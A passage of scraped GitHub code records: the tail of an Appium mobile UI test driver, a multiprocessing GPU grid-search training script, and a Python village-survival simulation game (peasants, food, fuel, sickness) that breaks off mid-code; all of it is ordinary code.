else:\n log.warn('暂未获取到可用设备')\n print('No device found')\n\n def get_driver(cls):\n desired_caps = {\n 'platformName': platformName,\n 'deviceName': webDriver().get_deviceName(),\n # 'platformVersion': webDriver().get_platformVersion(),\n 'platformVersion': '9',\n 'appPackage': appPackage,\n 'appActivity': appActivity,\n 'automationName': 'uiautomator2',\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n 'noReset': True,\n 'newCommandTimeout': 6000,\n 'app': app_path\n }\n try:\n # Sp().stop_appium()\n # Sp().start_appium() #自动化全跑的话再运行\n driver = webdriver.Remote('http://127.0.0.1:%s/wd/hub'%appium_port, desired_caps)\n time.sleep(4)\n print(\"driver加载成功\")\n return driver\n except WebDriverException:\n print(\"driver加载失败\")\n\n # @classmethod\n # def setUpClass(cls):\n # global driver, countA\n # # appium启动服务只运行一次\n # if countA == 1:\n # # 启动appium服务\n # Sp().start_appium() # 自动化全跑的话再运行\n # countA = countA + 1\n # cls.get_driver()\n\n # @classmethod\n # def tearDownClass(cls):\n # # 关闭浏览器驱动\n # cls.driver.quit()\n # # 卸载app\n # cls.driver.removeApp(appPackage);\n # # 关闭appium服务\n # Sp().stop_appium()\n\n# if __name__ == \"__main__\":\n# webDriver().get_driver()\n# cur_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"..\"))) + \"\\\\testSmoke\"\n# print(cur_path)\n", "repo_name": "dongyn/UI-Test", "sub_path": "comm/webDriver.py", "file_name": "webDriver.py", "file_ext": "py", "file_size_in_byte": 3260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "comm.readConfig.ReadConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "comm.Log.Logger", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 27, "usage_type": "call"}, 
{"api_name": "os.popen", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver.Remote", "line_number": 68, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.WebDriverException", "line_number": 72, "usage_type": "name"}]} +{"seq_id": "11427199662", "text": "import argparse\nimport logging\nimport os\nfrom glob import glob\nimport importlib\nimport sys\nimport csv\nimport traceback\nimport time\nfrom multiprocessing import Process, Queue\nfrom common.util import mkdir_if_not_exists, print_info, get_human_readable_time, LossException\nimport json\n\n#DEFAULT_DATASET = \"/media/bighdd5/simon/projects/data/datasets/hourglass_samples_with_afw_without_multipie.h5\"\n\n# TODO improve logging, use Lock to ensure only one process prints to stdout?\n# https://stackoverflow.com/questions/13733552/logger-configuration-to-log-to-file-and-print-to-stdout\n# https://docs.python.org/3/howto/logging-cookbook.html\n\nALL_WORK_DONE_TOKEN = \"__NOTHING_LEFT_TO_DO__\" # Used to mark queue end\n\n\nclass Worker(object):\n def __init__(self, gpu_id, sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue):\n self.gpu_id = int(gpu_id)\n self.sub_gpu_id = int(sub_gpu_id)\n self.config_queue = config_queue\n self.trainer_module = importlib.import_module(\"%s.main\" % model_dir)\n self.output_dir = output_dir\n self.result_queue = result_queue\n self.data = data\n\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n print_info(\"Created folder '%s'\" % self.output_dir)\n\n def work(self):\n while True:\n configfile = self.config_queue.get()\n if configfile == ALL_WORK_DONE_TOKEN:\n msg = \"GPU %d.%d found an empty queue => Terminate\" % (self.gpu_id, self.sub_gpu_id)\n print_info(msg)\n logging.info(msg)\n return\n\n print_info(\"[qsize=%d] GPU %d.%d -> %s\" % (self.config_queue.qsize(), self.gpu_id, self.sub_gpu_id, configfile))\n\n time.sleep((self.gpu_id + self.sub_gpu_id + 100) / 1000)\n\n try:\n model_trainer = self.trainer_module.ModelTrainer(config=configfile,\n output_dir=self.output_dir,\n gpu_id=self.gpu_id,\n sub_gpu_id=self.sub_gpu_id,\n data=self.data,\n gridsearch=True)\n results = model_trainer.run()\n self.result_queue.put(results)\n msg = \"GPU %d.%d finished %s\" % (self.gpu_id, self.sub_gpu_id, configfile)\n print_info(msg)\n logging.info(msg)\n\n except Exception as e:\n msg = \"Config '%s' failed on GPU %d.%d: \\n>>> %s\" % (configfile, self.gpu_id, self.sub_gpu_id, str(e))\n print_info(msg)\n logging.error(msg)\n if not isinstance(e, LossException):\n traceback.print_exc()\n\n try:\n fn = os.path.join(self.output_dir, \"failed.txt\")\n with open(fn, \"a\") as f:\n f.write(\"[%s] %s : %s\\n\\n\" % (get_human_readable_time(), configfile, msg))\n except Exception as e2:\n msg = \"Failure could not be written to failed.txt: %s\" % str(e)\n print_info(msg)\n logging.error(msg)\n\n time.sleep(1) # Wait in case GPU needs time to release memory\n\n @staticmethod\n def run_worker(gpu_id, sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue):\n \"\"\"\n This static helper method is to ensure that is no reference to each worker in the parent process.\n This is just to avoid any side effects of using PyTorch and other libs in parallel (these side effects\n occured when using Threads instead of Processes and caused DataLoader to freeze randomly)\n \"\"\"\n worker = Worker(gpu_id, 
sub_gpu_id, config_queue, model_dir, output_dir, data, result_queue)\n worker.work()\n\n\nclass ResultHandler(object):\n def __init__(self, queue, result_file, done_list_file):\n self.queue = queue\n self.result_file = result_file\n self.done_list_file = done_list_file\n\n def work(self):\n with open(self.result_file, 'a', newline='') as csvfile, \\\n open(self.done_list_file, 'a') as done_list:\n writer = None\n\n while True:\n result = self.queue.get()\n if result == ALL_WORK_DONE_TOKEN:\n msg = \"Result writer process found an empty queue => Terminate\"\n print_info(msg)\n logging.info(msg)\n return\n\n if not writer:\n # This is a little workaround to the problem that it must be known in advance which fields\n # will be written to the file. The first result in the queue defines the set of fieldnames\n # that will be written to the header. It is assumed that every result contains the same set\n # of keys. If new keys are added to new results, an exception will be thrown.\n ks = [k for k in result.keys() if k != \"metrics_log\"]\n writer = csv.DictWriter(csvfile, fieldnames=ks)\n writer.writeheader()\n\n if \"metrics_log\" in result:\n metrics_log = result[\"metrics_log\"]\n result = {k:v for k,v in result.items() if k != \"metrics_log\"}\n config_id = result[\"config_id\"]\n\n directory, _ = os.path.split(self.result_file)\n target = os.path.join(directory, \"results\", \"%d_metrics.log\" % config_id)\n json.dump(metrics_log, open(target, \"w\"))\n\n writer.writerow(result)\n csvfile.flush() # needed to ensure that nothing is lost in case of crashes\n\n # Write the path to the config file that has just been finished to a file that can be used the next\n # time to skip already completed configs.\n done_list.write(\"%s\\n\" % result[\"config_file\"]) # TODO only write config id\n done_list.flush()\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Perform grid search on a model in MODEL_DIR using hyperparameter\"\n \"configurations from CONFIG_DIR and write results to OUTPUT_DIR\")\n parser.add_argument('model_dir',\n type=str,\n help='directory of model that contains a main.py')\n\n parser.add_argument('config_dir',\n type=str,\n help='directory of commands')\n\n parser.add_argument('output_dir',\n type=str,\n help='where to store plots, trained models, results, etc')\n\n parser.add_argument('dataset',\n type=str,\n help=\"Source data to train model\")\n\n parser.add_argument('--no_skip',\n action=\"store_true\",\n help=\"Ignore items in done_configs.txt and train them again (if this flag is not set, configs \"\n \"listed in done_configs.txt will be skipped. Useful when training should be resumed). 
\"\n \"Existing models, plots, results/*.txt will be overridden\")\n\n parser.add_argument('--gpus',\n type=int,\n default=[0, 1, 2, 3],\n nargs=\"+\",\n help='IDs of GPUs to use, separated by spaces')\n\n parser.add_argument('--workers_per_gpu',\n type=int,\n default=1,\n help=\"For small models, run multiple models on one GPU\")\n\n opt = parser.parse_args()\n\n output_dir = os.path.abspath(opt.output_dir)\n mkdir_if_not_exists(output_dir)\n logfile = os.path.join(output_dir, \"trainer.log\")\n\n logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] <%(levelname)s> %(message)s',\n filename=logfile, filemode='a')\n logging.info(\"-------- trainer.py started ------------\")\n\n print(\"Training '%s' with confs '%s' on GPUs %s\" % (opt.model_dir, opt.config_dir, \",\".join(map(str, opt.gpus))))\n\n # Needed to enable models to import relatively to their own folder (they do not have to know about trainer.py)\n sys.path.append(os.path.join(os.path.dirname(__file__), opt.model_dir))\n\n skip_list_file = os.path.join(output_dir, \"done_configs.txt\")\n skip_configfiles = []\n if not opt.no_skip and os.path.exists(skip_list_file) and os.path.isfile(skip_list_file):\n with open(skip_list_file, 'r') as f:\n skip_configfiles = f.read().splitlines()\n\n config_queue = Queue()\n for configfile in glob(os.path.join(opt.config_dir, \"*.json\")): # TODO only check for ID and not full path\n if configfile in skip_configfiles:\n print(\"Skip %s\" % configfile)\n else:\n config_queue.put(configfile)\n\n results_csv = os.path.join(opt.output_dir, \"results_0.csv\")\n c = 1\n while os.path.exists(results_csv) and os.path.isfile(results_csv):\n print(\"%s exists\" % results_csv)\n results_csv = os.path.join(opt.output_dir, \"results_%d.csv\" % c)\n c += 1\n print(\"results file: %s\" % results_csv)\n\n result_queue = Queue()\n result_handler = ResultHandler(result_queue, results_csv, skip_list_file)\n result_process = Process(name=\"result_handler\", target=result_handler.work)\n result_process.daemon = True\n result_process.start()\n\n processes = []\n for gpu_id in opt.gpus:\n for sub_gpu_id in range(opt.workers_per_gpu):\n config_queue.put(ALL_WORK_DONE_TOKEN) # To signal the workers that they can stop, put this num_worker times at the end of the queue (so each process will read it exactly one time at the end)\n p = Process(name=\"gpu_%d.%d_worker\" % (gpu_id, sub_gpu_id), target=Worker.run_worker, args=(gpu_id, sub_gpu_id, config_queue, opt.model_dir, output_dir, opt.dataset, result_queue))\n p.start()\n processes.append(p)\n print_info(\"Worker for GPU %d.%d started\" % (gpu_id, sub_gpu_id))\n\n for p in processes:\n p.join()\n print(\"All jobs are done\")\n\n result_queue.put(ALL_WORK_DONE_TOKEN) # To signal the process that it can stop\n result_process.join()\n print(\"All results written\")\n\n logging.shutdown()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "simonhessner/masters-thesis-final", "sub_path": "code/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 10675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "importlib.import_module", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 34, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 35, "usage_type": "call"}, 
{"api_name": "common.util.print_info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 61, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 66, "usage_type": "call"}, {"api_name": "common.util.LossException", "line_number": 67, "usage_type": "argument"}, {"api_name": "traceback.print_exc", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.util.get_human_readable_time", "line_number": 73, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 108, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 127, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 181, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 181, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 188, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 192, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 192, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 196, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 197, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 211, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 213, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 221, "usage_type": "call"}, {"api_name": "common.util.print_info", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.shutdown", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "6594041699", "text": "import random\nimport math\n\nclass Charac(object):\n def __init__(self,like,respect,attract,name,img,ide,characters):\n self.like = like\n self.resp = respect\n self.att = attract\n self.name = name\n self.ide = ide\n self.scene = 1\n characters.append(self)\n print(characters)\n\n def __str__(self):\n print(self.ide)\n\n def statchange(self,stat,change):\n self.__dict__[stat] += change\n print(self.name + \"'s \" + str(stat) + \" stat changed by \" + str(change))\n\n def relchange(self,other,change):\n self.__dict__[other.ide] += change\n other.__dict__[self.ide] += change\n print(self.name + \" and \" + str(other.name) + \"'s relationship changed by \" + str(change))\n\n def establishrels(self,characters):\n for i in range(len(characters)):\n if characters[i].ide != self.ide:\n setattr(self, characters[i].ide, 0)\n\n\n\nclass Peasant(object):\n def __init__(self, name,peasants,children,elders,workers):\n def getRandomAge():\n age = -1\n mu = 40\n sigma = 35\n while age < 1 or age > 80:\n age = int(round(random.gauss(mu, sigma)))\n return age\n self.name = name\n self.age = getRandomAge()\n self.warmth = 100\n self.maxwarmth = 100\n self.hunger = 100\n self.maxhunger = 100\n if self.age > 20:\n self.maxhealth = 120-self.age\n else:\n self.maxhealth = 100\n\n self.currenthealth = (3*self.maxhealth/4)\n\n self.passionHunting = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionFishing = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionForaging = random.randint(random.randint(1,4),random.randint(6,10))\n self.passionGathering = random.randint(random.randint(1,4),random.randint(6,10))\n\n choice = random.randint(1,4)\n if choice == 1:\n self.passionHunting = random.randint(1,10)\n elif choice == 2:\n self.passionFishing = random.randint(1,10)\n elif choice == 3:\n self.passionForaging = random.randint(1,10)\n else:\n self.passionGathering = random.randint(1,10)\n\n self.occupation = \"General Worker\"\n self.status = \"Alive and Well\"\n self.hasPelt = 0\n self.hasFire = 0\n if self.age > 60:\n self.occupation = \"Elder\"\n elders.append(self)\n elif self.age < 20:\n self.occupation = \"Child\"\n children.append(self)\n else:\n workers.append(self)\n peasants.append(self)\n \n\nclass Game(object):\n def __init__(self):\n self.characters = []\n self.crier = Charac(0,0,0,'Nat',\"image!!!\",\"crier\",self.characters)\n self.butcher = Charac(0,0,0,'Mik',\"image!!!\",\"butcher\",self.characters)\n self.herbalist = 
Charac(0,0,0,'Joan',\"image!!!\",\"herbalist\",self.characters)\n self.widow = Charac(0,0,0,'Elena',\"image!!!\",\"widow\",self.characters)\n self.landowner = Charac(0,0,0,'Elisabetta',\"image!!!\",\"landowner\",self.characters)\n self.innkeeper = Charac(0,0,0,'Henryk',\"image!!!\",\"innkeeper\",self.characters)\n self.doctor = Charac(0,0,0,'Fyodora',\"image!!!\",\"doctor\",self.characters)\n self.alderman = Charac(0,0,0,'Alexi',\"image!!!\",\"alderman\",self.characters)\n self.initrels(self.characters)\n\n self.peasants = []\n self.workers = []\n self.elders = []\n self.children = []\n\n self.actions = 5\n self.playerFuel, self.playerHerb, self.playerhuntedFood, self.playerPelts, self.playerfishedFood = 0,0,0,0,0\n self.eventstag = False # initialise all events and scenes as booleans and ranges within arrays respectively\n self.eventstagnight = False\n\n for i in range(100):\n Peasant('Tudor ' + str(i),self.peasants,self.children,self.elders,self.workers)\n\n \n self.workersnum = 10\n self.workersorder = 0\n self.initialiseWorkers()\n\n \n \n self.popHealthy = 100\n self.popIll = 0\n self.popDead = 0\n self.popRecovering = 0\n self.popBuried = 0\n\n self.newRecovered = 0\n self.newIll = 0\n self.newDead = 0\n\n\n self.popMorale = 50\n self.popCohesion = 30\n\n self.debugmod = 100\n # starting values for resources\n self.worldherbs = 2000*self.debugmod\n self.herbs = 0\n self.medicine = 0\n self.alcohol = 0\n self.worldfuel = 9000*self.debugmod\n self.fuel = 200\n self.worldpelts = 180*self.debugmod\n self.pelts = 0\n self.food = 250\n self.worldfood = 4000*self.debugmod\n \n self.fueleffect = 20\n self.foodeffect = 20\n\n self.foodchoice = 2\n self.fuelchoice = 2\n self.herbchoice = 3\n self.peltchoice = 2\n\n self.day = 0\n self.rollevent = random.randint(1,4)\n self.adjectivePrecip = ['dry','raining','snowing']\n self.adjectiveWind = ['calm','windy','blowing a gale']\n self.adjectiveCold = ['mild','chilly','brisk','freezing','deathly']\n\n def initialiseWorkers(self):\n def topWorker(professionlist, occTag, passion):\n tagged = 0\n count = 0\n #print(passion)\n high = sorted(self.workers, key=lambda x: x.__dict__[passion], reverse=True)\n while tagged == 0:\n #print(count)\n #print(high[count].occupation)\n if high[count].occupation == 'General Worker':\n high[count].occupation = occTag\n professionlist.append(high[count])\n tagged = 1\n else:\n if count 0:\n heat = (math.log(peasant.hasFire,2)+2)*self.fueleffect\n print(heat)\n if peasant.hasPelt > 0:\n heat += (self.fueleffect)\n warmthchange = (heat-self.cold)\n print(\"heat :\" +str(heat))\n print(\"coldness of weather : \" + str(self.cold))\n print(\"warmth change : \" + str(warmthchange))\n\n print(\"old warmth : \" + str(peasant.warmth))\n peasant.warmth = self.addsubLim(peasant.warmth,warmthchange,peasant.maxwarmth) \n\n print(\"new warmth : \" + str(peasant.warmth))\n a = self.subLim(peasant.currenthealth,(peasant.maxwarmth-peasant.warmth)/5,0)\n peasant.currenthealth = a\n print(\"current health : \" + str(peasant.currenthealth))\n\n\n def hungercheck(self):\n for peasant in self.peasants:\n hunger = 0\n if peasant.hasFood > 0:\n hunger = (math.log(peasant.hasFood,2)+2)*self.foodeffect\n \n hungerchange = (hunger-self.cold)\n peasant.hunger = self.addsubLim(peasant.hunger,hungerchange,peasant.maxhunger)\n print(\"fedness : \"+ str(peasant.hunger))\n print(\"current health : \" + str(peasant.currenthealth))\n a = self.addsubLim(peasant.currenthealth,(peasant.hunger-50)/10,peasant.maxhealth)\n peasant.currenthealth = a\n 
print(\"new health : \" + str(peasant.currenthealth))\n print(\" Name : {name} - Occupation : {occ} - Health : {health}/{maxhealth}\".format(name=peasant.name,occ=peasant.occupation,health=peasant.currenthealth,maxhealth=peasant.maxhealth))\n \n\n def advanceNight(self):\n self.bigFeast()\n self.bigBurn()\n\n self.distributePelts()\n\n self.giveMedicine()\n\n self.recovered()\n self.sickDie()\n self.newSick()\n\n self.warmcheck()\n self.hungercheck()\n\n # morning here\n self.morale_sick_dead()\n self.checkPop()\n\n self.day += 1\n self.startDayMessage()\n if self.day<30:\n self.playerFuel, self.playerHerb, self.playerPelts, self.playerhuntedFood, self.playerfishedFood = 0,0,0,0,0\n self.actions = 5\n self.rollevent = random.randint(1,4)\n self.weatherMake()\n self.newWorkers()\n self.worldDecay()\n return\n\n def startDayMessage(self):\n print(\"\")\n print(\"Day \" + str(self.day) + \" has begun\")\n\n def endDayMessage(self):\n print(\"\")\n print(\"Day \" + str(self.day) + \" has ended\")\n print(\"End of day report:\")\n\n def addLim(self, a, b, limit):\n c = a+b\n print(a)\n print(b)\n print(c)\n if c>limit:\n return limit\n else:\n return c\n\n def subLim(self, a, b, limit):\n d = a-b\n if d=0:\n return self.addLim(a,b,uplim)\n else:\n return self.subLim(a, -b, downlim)\n\n def genworkersMiniEvent(self): # if too few townspeople for nonworkers and resource management, lose cohesion, morale or resources / else vice versa\n pass\n\n def morale_yields_main(self): # gain if good yields, loss if casualties\n pass\n\n def bigFeast(self):\n def eatFood(peasant):\n peasant.hasFood = 0\n if self.distfood > 0:\n self.distfood -= self.foodpp\n peasant.hasFood = (self.foodpp)\n if peasant.hasFood >= 2:\n self.popCohesion = self.addLim(self.popCohesion,0.1,100)\n elif peasant.hasFood < 1 and peasant.hasFood > 0:\n self.popMorale = self.subLim(self.popMorale,0.1,0)\n else:\n self.popMorale = self.subLim(self.popMorale,1,0)\n self.popCohesion = self.subLim(self.popCohesion,1,0)\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n eatFood(peasant)\n \n\n def bigBurn(self):\n def burnLog(peasant):\n peasant.hasFire = 0\n if self.distfuel > 0:\n self.distfuel -= self.fuelpp\n peasant.hasFire = (self.fuelpp)\n if peasant.hasFire >= 2:\n self.popMorale = self.addLim(self.popMorale,0.1,100)\n elif peasant.hasFire < 1 and peasant.hasFire > 0:\n self.popCohesion = self.subLim(self.popCohesion,0.1,0)\n else:\n self.popMorale = self.subLim(self.popMorale,1,0)\n self.popCohesion = self.subLim(self.popCohesion,1,0)\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n burnLog(peasant)\n\n def giveMedicine(self):\n def takeMeds(peasant):\n if self.medicine > 0:\n self.medicine -= 1\n peasant.hasMeds = 1\n\n random.shuffle(self.peasants)\n for peasant in self.peasants:\n peasant.hasMeds = 0\n if peasant.status == \"Sick\":\n takeMeds(peasant)\n\n def morale_sick_dead(self): \n pass\n\n def distributePelts(self):\n self.used_pelts = 0\n def peltTime(peasant):\n peasant.hasPelt = 0\n if self.used_pelts < self.pelts:\n peasant.hasPelt = 1\n self.used_pelts += 1\n for peasant in self.peasants:\n peltTime(peasant)\n\n def checkPop(self):\n self.popIll = 0\n self.popHealthy = 0\n self.popDead = 0\n self.popRecovering = 0\n self.popBuried = 0\n for peasant in self.peasants:\n if peasant.status == \"Alive and Well\":\n self.popHealthy += 1\n elif peasant.status == \"Sick\":\n self.popIll += 1\n elif peasant.status == \"Recovering from Sickness\":\n self.popHealthy += 1\n elif peasant.status 
== \"Dead\":\n self.popDead += 1\n else:\n self.popBuried += 1\n\n \n def workersBack(self): # make more probabilistic and proportional to value of resources\n def skillRoll(worker,skill,m_yield):\n rnd = random.randint(1,10)\n if rnd < worker.__dict__[skill]:\n return m_yield\n else:\n #worker.currenthealth = self.subLim(worker.currenthealth, rnd, 0)\n return m_yield/2\n\n def fromWorld(percentage,resource):\n takeaway = round((percentage/1000.0)*self.__dict__['world'+str(resource)]*(2**((self.popMorale/50)-1)))\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n def fromWorldAbs(absol,resource):\n takeaway = absol\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n gatheredsucc = 0\n gatheredFuel = 0\n foragedsucc = 0\n foragedHerb = 0\n huntedsucc = 0\n huntedPelts = 0\n huntedFood = 0\n fishedsucc = 0\n fishedFood = 0\n for i in range(len(self.gatherers)): # all workers roll for success, and can either fail or choose to half succeed with a consequence\n \n gatheredsucc += skillRoll(self.gatherers[i],'passionGathering',1)\n self.gatherers[i].currenthealth = self.subLim(self.gatherers[i].currenthealth,random.randint(1,8),0) \n for i in range(len(self.foragers)):\n foragedsucc += skillRoll(self.foragers[i],'passionForaging',1)\n self.foragers[i].currenthealth = self.subLim(self.foragers[i].currenthealth, random.randint(1,8),0)\n for i in range(len(self.hunters)):\n huntedsucc += skillRoll(self.hunters[i],'passionHunting',1)\n self.hunters[i].currenthealth = self.subLim(self.hunters[i].currenthealth, random.randint(1,8),0)\n for i in range(len(self.fishermen)):\n fishedsucc += skillRoll(self.fishermen[i],'passionFishing',1)\n self.fishermen[i].currenthealth = self.subLim(self.fishermen[i].currenthealth, random.randint(1,8),0)\n\n gatheredFuel = fromWorld(gatheredsucc,'fuel')\n foragedHerb = fromWorld(foragedsucc,'herbs')\n huntedFood = fromWorld(huntedsucc,'food')\n ## change this VV\n huntedpeltssucc = 0\n for i in range(int(huntedFood)):\n if random.randint(1,100) >= 99:\n huntedpeltssucc+=1\n huntedPelts = fromWorldAbs(huntedpeltssucc,'pelts')\n fishedFood = fromWorld(fishedsucc,'food')\n return gatheredFuel, foragedHerb, huntedFood, huntedPelts, fishedFood\n\n def playerHarvest(self,harvesttype,actioncost):\n def fromWorld(percentage,resource):\n takeaway = round(((actioncost*1.5)-0.5)*(percentage/1000.0)*self.__dict__['world'+str(resource)])\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n def fromWorldAbs(absol,resource):\n takeaway = absol\n self.__dict__['world'+str(resource)] = self.subLim(self.__dict__['world'+str(resource)],takeaway,0) \n return takeaway\n\n self.playersuccess = 10\n if harvesttype == \"hunt\" or harvesttype == \"fish\":\n restype = \"food\"\n elif harvesttype == \"gather\":\n restype = \"fuel\"\n else:\n restype = \"herbs\"\n\n harvested = fromWorld(self.playersuccess,restype)\n if harvesttype == \"gather\":\n self.playerFuel += harvested\n elif harvesttype == \"forage\":\n self.playerHerb += harvested\n elif harvesttype == \"fish\":\n self.playerfishedFood += harvested\n else:\n huntedpeltssucc = 0\n for i in range(int(harvested)):\n if random.randint(1,100) >= 99:\n huntedpeltssucc+=1\n self.playerPelts += fromWorldAbs(huntedpeltssucc,'pelts')\n self.playerhuntedFood += harvested\n self.actions -= (actioncost)\n\n def updateRes(self, 
gatheredFuel, foragedHerb, huntedFood, huntedPelts, fishedFood):\n self.food += fishedFood\n self.fuel += gatheredFuel\n self.herbs += foragedHerb\n self.food += huntedFood\n self.pelts += huntedPelts\n return\n\n\n def genworkerRandomChange(self):\n for i in range(len(self.genworkers)):\n self.genworkers[i].currenthealth = self.addsubLim(self.genworkers[i].currenthealth,random.randint(-2,2),self.genworkers[i].maxhealth)\n \n\n def recovered(self):\n for i in range(len(self.peasants)):\n if self.peasants[i].status == 'Recovering from Sickness':\n self.peasants[i].status = 'Alive and Well'\n \n def sickDie(self):\n \n self.newRecovered = 0\n self.newDead = 0\n def tryTakeMeds(sicko):\n if sicko.hasMeds > 0:\n print(sicko.name + \" is recovering from sickness after being treated\")\n sicko.status = 'Recovering from Sickness'\n self.newRecovered += 1\n else:\n if random.randint(1,100) > (sicko.currenthealth+sicko.warmth)/2:\n print(sicko.name + \" has died.\")\n sicko.status = 'Dead'\n self.newDead += 1\n else:\n sicko.currenthealth = self.addLim(sicko.currenthealth, round(0.1*sicko.currenthealth),sicko.maxhealth)\n print(sicko.name + \" is recovering from sickness despite the lack of medicine\")\n sicko.status = 'Recovering from Sickness'\n self.newRecovered += 1\n\n for i in range(len(self.peasants)):\n if self.peasants[i].currenthealth <= 0 and self.peasants[i].status != 'Dead':\n self.peasants[i].status = 'Dead'\n self.newDead += 1\n if self.peasants[i].status == 'Dead':\n self.peasants[i].currenthealth = 0\n if self.peasants[i].status == 'Sick':\n tryTakeMeds(self.peasants[i])\n\n\n\n \n def newSick(self):\n self.newIll = 0\n for i in range(len(self.peasants)):\n if self.peasants[i].status == 'Alive and Well' and (self.peasants[i].currenthealth+self.peasants[i].warmth)/2 < 40:\n if random.randint(1,100) > self.peasants[i].currenthealth:\n print(self.peasants[i].name + \" (\" + self.peasants[i].occupation + \") has taken ill\")\n self.peasants[i].status = 'Sick'\n self.newIll += 1\n else:\n self.peasants[i].currenthealth = self.addLim(self.peasants[i].currenthealth, round(0.1*self.peasants[i].currenthealth),self.peasants[i].maxhealth)\n \n\n\n\n \n \"\"\"\n def communityChange(self):\n self.newill = self.newIll()\n self.newdead, self.newrecovered = self.newDead()\n self.pophealthy += self.newrecovered - self.newill\n self.popill += self.newill - 